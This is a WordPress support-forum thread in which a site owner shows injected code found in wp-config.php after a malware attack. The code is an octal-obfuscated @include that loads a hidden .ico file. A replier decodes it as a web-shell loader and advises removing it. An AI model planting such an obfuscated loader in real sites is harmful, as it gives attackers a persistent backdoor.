Unusual wp-config

  • Have been having issues with our hosting and a malware attack.
    Have cleaned a lot out but have found that the wp-config file is changed to the following
    <?php
    define( ‘WP_CACHE’, true );
    /*843fc*/

    @include “\057home\061/bos\163com/\160ubli\143_htm\154/wp-\143onte\156t/.1\0703a6a\0649.ic\157”;

    /*843fc*/

    Can anyone advise if this is normal or part of the problem.

    • This topic was modified 3 years, 8 months ago by time2see.

    The page I need help with: [log in to see the link]

Viewing 5 replies - 1 through 5 (of 5 total)
  • Anonymous User 17160716

    (@anonymized-17160716)

    time2see, hi there.

    Nope, it’s a chunk of malware code, you should remove this one for sure.

    In your case it means @include "/home1/bosscom/public_html/wp-content/.183a6a49.ico"; (web shell).

    That include part is definitely not normal. Be sure to look on your server at that folder to delete whatever is there, unless you host has some strange setup.

    Thread Starter time2see

    (@time2see)

    I have now replaced everything except wp-config and the folder wp-content
    All working fine.
    @joyously Cant find the folder as per above through Cpanel?
    Stumped now.

    I would suggest asking your ISP to see if there is some malicious software on the server

    WP-CONFIG.PHP never in my experience over the years has ever seen that or anything like it

    WP does modify the file from within the admin for setup etc

    Have you checked if you can see it by FTP?

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Unusual wp-config’ is closed to new replies.